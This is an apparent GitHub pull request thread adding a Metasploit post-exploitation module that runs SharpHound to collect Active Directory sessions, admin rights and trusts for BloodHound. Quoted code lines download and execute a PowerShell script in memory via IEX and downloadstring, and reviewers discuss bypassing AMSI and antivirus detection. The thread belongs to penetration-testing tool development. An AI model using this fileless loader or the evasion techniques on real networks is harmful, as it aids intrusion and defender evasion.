Add post module to execute SharpHound ingestor and gather all the files
rapid7/metasploit-framework pull request #10579
Opened 2018-09-02 21:25 UTC by h4ng3r

This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use post/windows/gather/bloodhound`
- [x] `set SESSION $SESSION$`
- [x] `run`
- [x] **Verify** that the module loads a powershell and runs it
- [x] **Verify** that the module after a few minutes creates a loot with the BloodHound results in zip format
- [ ] **Document** ([BloodHound](https://github.com/BloodHoundAD/BloodHound/))

2018-09-03 01:06 UTC, sempervictus reviewed
Can we pull the output as printed to the console, or do we have to generate the zip?
Thanks for adding this

2018-09-03 01:06 UTC, sempervictus commented on modules/post/windows/gather/bloodhound.rb
> +    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -MaxLoopTime #{datastore['MAXLOOPTIME']} -CompressData -RemoveCSV -CSVFolder \"#{tmp
Invoke-expression can make amsi unhappy, suggest "&(...)"

2018-09-03 06:03 UTC, h4ng3r commented on modules/post/windows/gather/bloodhound.rb
> +    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -MaxLoopTime #{datastore['MAXLOOPTIME']} -CompressData -RemoveCSV -CSVFolder \"#{tmp
I'm working to update the powershell with the amsi bypass. The "data/post/powershell/SharpHound.ps1" powershell is from the BloodHound framework itself, I tried to modify the minimum so I can update it with each BloodHound release. The SharpHound ingestor's output is several (3-5) CSV files or a zip file with all CSV inside. For a medium company with 200 hosts in the DC I have 4 CSV with 500K in total. Seems to much for an output console thats why I though using the zip is better.

2018-09-04 17:10 UTC, egypt reviewed
I'm a little concerned about keeping SharpHound.ps1 up to date in the future but it doesn't change that often, so it might be fine

2018-09-04 17:10 UTC, egypt commented on modules/post/windows/gather/bloodhound.rb
> +        m = line.match(/Compressing data to (.*\.zip)/)
I think this might be a race condition. Bloodhound takes a bit of time after printing this before the zip is actually written to disk. You could move the `sleep` between this line and the next to avoid issues.

2018-09-04 17:45 UTC, h4ng3r commented on modules/post/windows/gather/bloodhound.rb
> +    register_options([
Added in the new commit. I'll check all the options and add the relevant ones.

2018-09-04 17:45 UTC, h4ng3r commented on modules/post/windows/gather/bloodhound.rb
> +    start_service()
True, this avoid to start the service if we dont have a PS. Fixed.

2018-09-04 17:46 UTC, h4ng3r commented on modules/post/windows/gather/bloodhound.rb
> +        m = line.match(/Compressing data to (.*\.zip)/)
nice catch, thx fixed.

2018-09-04 17:47 UTC, h4ng3r commented on modules/post/windows/gather/bloodhound.rb
> +    register_options([
Does MSF have a way to parse optional arguments and add them only if defined?

2018-09-05 18:26 UTC, wvu-r7 commented on modules/post/windows/gather/bloodhound.rb
> +    ))
They sure can!

2018-09-05 18:27 UTC, wvu-r7 commented on modules/post/windows/gather/bloodhound.rb
> +    ))
(You wrote it, btw. :)

2018-09-12 13:57 UTC, egypt commented on modules/post/windows/gather/bloodhound.rb
> +    ))
I thought so, but it's been a minute since I looked at that code. =)

2018-09-17 19:49 UTC, phra requested changes
two points:

- include all command line options as @h4ng3r suggested

- not sure about AV detection of shipping the original `SharpHound.ps1` script via `IEX`, especially with latest versions of powershell. opinions?

2018-09-17 19:49 UTC, phra commented on modules/post/windows/gather/bloodhound.rb
> +    register_options([
+1 about mimicking the original command line syntax, eg. `-SearchForest` option.

2018-09-17 19:49 UTC, phra commented on modules/post/windows/gather/bloodhound.rb
> +    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -CollectionMethod #{datastore['COLLECTIONMETHOD']} -MaxLoopTime #{datastore['MAXLOOP
not sure about AV detection of this. (including commercial solutions and custom signatures for `IEX..downloadString`)

just asking.. should not be better an approach a là `kiwi` extension?

2018-09-17 21:18 UTC, wvu-r7 commented on modules/post/windows/gather/bloodhound.rb
> +    register_options([
:mag: :evergreen_tree:

2018-09-26 16:08 UTC, h4ng3r commented
I've been quite out. Next week I'll add all the most relevant options and upgrade the SharpHound to the JSON version. Not sure what is the best option to deploy the SharpHound.ps1 the actual approach is fileless but I think it can't bypass amsi. I read that PowerSploit has a new way to deploy powershells in the beta3 in order to avoid detection, I'll research a little bit.
Thanks

2018-10-16 15:58 UTC, h4ng3r commented
I  added all the SharpHound params, updated the PS script to the new version and rebased.

2018-10-17 09:04 UTC, phra approved these changes

2018-12-06 21:31 UTC, h4ng3r commented
Any update on this PR?

2018-12-06 22:57 UTC, busterb commented
If everyone is happy with it, I can take a look at it.

2019-04-25 18:18 UTC, ccondon-r7 commented
Hey @h4ng3r, any chance you can get us a module doc like @busterb asked above? Thanks!

2019-04-28 20:52 UTC, h4ng3r commented
@ccondon-r7 I just pushed the documentation for the module, sorry for the delay I had completely forgotten about this PR.

2019-05-01 16:43 UTC, ccondon-r7 commented
No worries! It happens. @busterb fire away!

2019-12-26 15:42 UTC, acammack-r7 commented
@busterb any thoughts? Also, it seems this PR could use an update to the embedded SharpHound. I think writing a `tools/` script to do the update, and/or an option in the module to check (or even update!) the file would help keep us up-to-date.

2019-12-26 22:27 UTC, h4ng3r commented
Can I do something to help?

2020-02-08 21:13 UTC, h00die commented
As discussed with @busterb on slack, added a external script checker.  `-u` will also overwrite with the new version so its easy to do checkout a new branch, run the checker, add/commit/push.

https://github.com/h4ng3r/metasploit-framework/pull/1

2020-02-09 19:08 UTC, h00die commented
If I get a chance before @busterb I'm going to double check all the options are handled.  I have a minor testing domain, may try to script creating 10.000 users and randomly assigning them to 1,000 groups. Not sure if you can add fake domain computers, but also a thought.
The largest domain I ran sharphound on took 20min to do an all. Just for timing notes

2020-02-09 23:39 UTC, h4ng3r commented
Thanks @h00die for the push on this PR. To be honest after so long I though this PR was just dead.

2020-02-11 20:33 UTC, h4ng3r commented
@h00die @busterb any news? Do you need anything from me?

2020-02-11 23:34 UTC, h00die commented
I plan to do a code review this week if @busterb doesn't get to it first.

2020-02-11 23:39 UTC, h4ng3r commented
Thank you @h00die very much and sorry for insisting, but I didn't want to lose the momentum now that it seems we almost have it.

2020-02-12 01:28 UTC, ccondon-r7 commented
Hey both, Brent and two-thirds of the Metasploit team are in a training this week and won't get to PRs. Go for it!

2020-02-13 14:06 UTC, h00die requested changes
This is just a quick review w/o running it.
I think some of these changes are actually just because sharphound updated, and totally not your fault.  Unfortunate thing when a PR takes a while to land.

2020-02-13 14:06 UTC, h00die commented on modules/post/windows/gather/bloodhound.rb
> +          print_good("Downloaded #{zip_path}: #{p.to_s}")
no need to `to_s` since youve already string interpolated it

2020-02-13 14:10 UTC, h00die commented
Any thoughts from r7 people on using the encrypted zip functionality of sharphound?  I haven't used it for my tests, and I would assume people are passing the zip back through an encrypted channel, but if its automated, this may be a good and easy extra level of security to add.

2020-02-13 19:58 UTC, h4ng3r commented
I've tested it in the past and didn't have any problems, so for me we can use it as default.

2020-02-18 02:08 UTC, h00die commented
@h4ng3r no worries on this losing momentum.  I'm finishing up another PR review currently, then this one.
A buddy is working on a powershell script to generate random computers/groups/users in AD which will help test this out.  I may wait for that to finish so we could include a link for testing on this.

2020-04-03 14:11 UTC, merged

2020-04-05 11:43 UTC, phra commented
@h00die FYI https://github.com/davidprowe/BadBlood

2020-04-05 11:58 UTC, h00die commented
Thank you very much!!!!!

2020-04-05 12:56 UTC, busterb commented
Added a few changes to this, discussed with @h00die in advance, and updated sharphound to the latest as well:

b18a2fd463e707c5eba91b402a77a1e3d7f79be8
f2d3cdca4b7b418d99397ef00349ab529b3ed99d
f848f735a63ec80ad9c5813aba0a3abda4322410

2020-04-05 12:57 UTC, busterb commented
## Release Notes

This adds a post module for executing SharpHound ingester and gathering the resulting files for consumption by BloodHound. It also adds a script for checking and updating upstream vendored file-based dependencies.